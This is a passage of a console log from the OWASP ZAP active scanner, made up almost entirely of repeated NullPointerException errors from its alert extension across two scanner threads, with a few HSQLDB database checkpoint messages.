org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13456603 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13456603 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13456803 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13456803 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13457004 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13457008 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13457205 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13457205 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13457406 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13457412 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13457607 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13457607 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13457807 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13457807 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13458021 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13458208 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13458410 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13458419 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13458616 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13458618 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13458811 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13458811 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13459013 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13459013 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13459214 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13459414 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13459417 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13459616 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13459616 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13459816 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13459821 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13460017 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13460017 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13460217 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13460217 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13460418 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13460423 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13460619 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13460619 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13461361 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13461370 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13461563 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13461565 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13461765 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13461765 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13461971 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13462166 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13462168 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13462370 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13462370 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13462568 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13462577 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13462770 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13462770 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13462970 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13462975 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13463171 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13463173 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13463373 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13463373 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13463573 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13463580 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13463775 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13463775 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13463974 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13464177 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13464181 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13464376 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13464376 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13464576 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13464581 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13464784 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13464785 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13464987 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13464987 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13465187 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13465193 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13465390 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13465390 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13465589 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13465591 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13465791 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13465791 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13465991 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13467998 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13468199 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13469275 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13469285 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13469483 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13469484 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13469687 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13469691 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13469885 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13469885 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13470085 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13470889 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13471096 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13471290 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13471290 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13471491 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13471492 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13471692 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13471696 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13471893 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13471894 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13472095 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13472095 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13472296 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13472300 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13472496 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13472496 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13472697 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13472701 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13472897 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13472897 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13474905 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13475112 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13475317 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13475318 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13475520 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13475520 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13475719 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13475722 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13475920 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13475920 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13476122 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13476126 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13476320 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13476326 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13476523 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13476523 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13476722 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13476724 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13476924 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13476927 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13479696 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13479738 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13479933 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13479939 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13480132 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13480133 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13480334 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13480334 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13480536 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13480536 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13480737 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13480737 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13481743 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13481743 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13481941 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13481941 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13482143 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13482144 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13482343 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13482344 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13482545 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13482545 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13482745 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13482746 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13482945 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13482946 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13483148 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13483148 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13483346 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13483346 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13484010 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13484150 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13484150 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13484350 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13484351 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13484551 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13484551 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13484751 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13484751 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13484952 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13484952 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13485169 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13485171 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13485354 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13485356 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13485554 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13487169 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13487547 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13487555 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13487754 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13487757 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13487959 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13487960 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 13487960 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 13487966 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 13488692 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 13488695 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 13488701 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13488706 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13488908 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13488909 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13489110 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13489110 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13489310 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13489511 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13489511 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13489712 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13489713 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13489912 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13489912 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13490116 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13490116 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13490316 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13490321 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13490517 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13490518 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13490722 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13490723 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13490918 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13490918 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13491124 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13491125 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13491321 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13491322 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13491523 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13491523 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13491722 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13491722 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13491925 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13492125 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13492125 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13492326 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13492326 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13492526 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13492526 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13492728 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13492728 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13492928 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13492928 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13493127 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13493129 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13493330 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13493330 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13495134 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13495530 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13495731 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13495932 